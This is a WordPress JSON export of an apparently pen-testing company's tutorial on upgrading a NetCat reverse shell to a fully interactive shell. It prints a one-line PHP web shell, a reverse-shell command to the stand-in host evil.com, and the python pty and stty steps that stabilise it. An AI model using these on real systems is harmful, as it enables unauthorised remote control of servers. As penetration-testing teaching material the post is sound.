{"id":47609,"date":"2022-09-26T15:11:22","date_gmt":"2022-09-26T13:11:22","guid":{"rendered":"https:\/\/cyberant.com\/netcat-shell-upgraden\/"},"modified":"2023-11-09T13:50:00","modified_gmt":"2023-11-09T12:50:00","slug":"upgrade-netcat-shell","status":"publish","type":"post","link":"https:\/\/cyberant.com\/en\/upgrade-netcat-shell\/","title":{"rendered":"NetCat shell upgrade"},"content":{"rendered":"\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-l8isd9so-965adf5ab8e2e2d25d20fe5442fd599f\">\n#top .av_textblock_section.av-l8isd9so-965adf5ab8e2e2d25d20fe5442fd599f .avia_textblock{\nfont-size:40px;\n}\n<\/style>\n<section  class='av_textblock_section av-l8isd9so-965adf5ab8e2e2d25d20fe5442fd599f '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/BlogPosting\" itemprop=\"blogPost\" ><div class='avia_textblock'  itemprop=\"text\" ><h1 class=\"h2 entry-title\">NetCat shell upgrade<\/h1>\n<\/div><\/section>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-id0fsq-71f74b454ea3c229b9fa94848be5b28f\">\n#top .hr.hr-invisible.av-id0fsq-71f74b454ea3c229b9fa94848be5b28f{\nheight:30px;\n}\n<\/style>\n<div  class='hr av-id0fsq-71f74b454ea3c229b9fa94848be5b28f hr-invisible  avia-builder-el-1  el_after_av_textblock  el_before_av_textblock '><span class='hr-inner '><span class=\"hr-inner-style\"><\/span><\/span><\/div>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-l8isdymd-45d1ceebdfb2aab3695b17fb0abd6224\">\n#top .av_textblock_section.av-l8isdymd-45d1ceebdfb2aab3695b17fb0abd6224 .avia_textblock{\nfont-size:16px;\n}\n<\/style>\n<section  class='av_textblock_section av-l8isdymd-45d1ceebdfb2aab3695b17fb0abd6224 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/BlogPosting\" itemprop=\"blogPost\" ><div class='avia_textblock'  itemprop=\"text\" ><p>The holy grail during a pen test is a functioning shell. 
During a pen test, once the hacker has gained the ability to execute commands on the target system, the next step is usually to set up a connection from that system back to a server under the hacker&#8217;s control. <a href=\"https:\/\/en.wikipedia.org\/wiki\/Netcat\" target=\"_blank\" rel=\"noopener\">NetCat<\/a> is often used for this purpose. NetCat is a command-line networking tool that reads from and writes to raw TCP or UDP connections, which makes it possible to pipe a program&#8217;s input and output across the network. One of the biggest frustrations for hackers, however, is that the shell obtained this way is quite limited. Depending on the system, the binary may be called netcat, ncat or nc.<\/p>\n<h3>Hacking with NetCat<\/h3>\n<p>Suppose a hacker managed to upload a file called shell.php with the following content: <code>&lt;?php system($_GET['cmd']);?&gt;<\/code><\/p>\n<p>The hacker starts a listener on port 4444 on their own server (evil.com) with <code>nc -lvp 4444<\/code>. Next, the command <code>nc -e \/bin\/bash evil.com 4444<\/code> is executed on the hacked server, for example through the web shell above. The hacked server now opens a connection to the hacker&#8217;s server and attaches <code>\/bin\/bash<\/code> to it, so whatever the hacker types is executed on the hacked server. This is called a reverse TCP shell. Note that the <code>-e<\/code> option is only present in some netcat builds.<\/p>\n<p><code><br \/>\njohn@Technetium:~$ nc -lvp 4444<br \/>\nListening on [0.0.0.0] (family 0, port 4444)<br \/>\nConnection from [1.2.3.4] port 4444 [tcp\/*] accepted (family 2, sport 54490)<br \/>\nwhoami<br \/>\ncyberant<br \/>\n^C<br \/>\njohn@Technetium:~$ whoami<br \/>\njohn<br \/>\n<\/code><\/p>\n<p>Above is what the hacker sees. If the hacker accidentally presses CTRL-C, the local netcat process is terminated and the shell is gone. Commands that require interaction (such as <code>su<\/code>) do not work either.<\/p>\n<h3>How to upgrade a NetCat shell to an interactive shell?<\/h3>\n<p>The first step is to use Python to spawn the shell inside a pseudo-terminal (PTY). This can be done with Python&#8217;s pty module, as follows:<\/p>\n<p><code>python -c 'import pty; pty.spawn(\"\/bin\/bash\")'<\/code><\/p>\n<p>The above command produces a semi-interactive shell. 
That is, commands such as <code>su<\/code> and <code>mysql<\/code>, which prompt for a password, now work. The shell still dies on CTRL-C, and tab completion doesn&#8217;t work either. With a few simple commands (and a little magic) it can be turned into a full shell.<\/p>\n<p>Pressing <code>CTRL-Z<\/code> suspends the local netcat process and moves it to the background. The following is then typed in the local terminal:<code><br \/>\nstty raw -echo<br \/>\nfg<br \/>\n<\/code><\/p>\n<p><code>stty raw -echo<\/code> puts the local terminal into raw mode and disables local echo, so that keystrokes such as CTRL-C and TAB are passed through to the remote shell instead of being handled by the local terminal, and the remote PTY takes care of echoing; <code>fg<\/code> then brings netcat back to the foreground. The result is a full shell that can do everything an SSH session could: tab completion and history now work. And VIM through NetCat? Sure!<\/p>\n<\/div><\/section>\n<div  class='hr av-11xmy8q-2f99f363bf4509776c1d8ab67c8062e0 hr-default  avia-builder-el-3  
el_after_av_textblock  el_before_av_social_share '><span class='hr-inner '><span class=\"hr-inner-style\"><\/span><\/span><\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":11,"featured_media":1385,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[195,216],"tags":[182,183,197,190,191,185,186,198,194,188],"class_list":["post-47609","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hacken","category-knowledge-base","tag-cyber-security-en","tag-cyberaanval-en","tag-cybercriminelen-en","tag-datalekken-en","tag-etisch-hacker-en","tag-hacker-en","tag-it-infrastructuur-beschermen-en","tag-netcat-shell-upgraden-en","tag-pentest-en","tag-vulnerability-management-en"],"_links":{"self":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/posts\/47609","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/users\/11"}],"replies":[{"embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/comments?post=47609"}],"version-history":[{"count":0,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/posts\/47609\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/
media\/1385"}],"wp:attachment":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/media?parent=47609"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/categories?post=47609"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/tags?post=47609"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}